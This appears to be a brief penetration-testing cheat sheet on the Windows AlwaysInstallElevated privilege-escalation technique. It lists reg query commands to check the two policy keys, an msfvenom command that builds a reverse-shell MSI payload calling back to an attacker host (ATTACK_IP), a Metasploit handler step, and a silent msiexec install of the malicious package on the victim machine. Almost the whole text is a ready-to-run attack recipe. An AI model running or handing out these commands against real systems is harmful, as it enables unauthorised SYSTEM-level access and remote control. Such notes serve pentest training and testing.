AlwaysInstallElevated
Example:
Query and set 2 registry values:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedExploitation works only if BOTH have set values to 1!
1:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK_IP LPORT=LOCAL_PORT -f msi -o malicious.msi2: Use metasploit handler (use exploit/multi/handler)
3: On victim machine:
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msiLast updated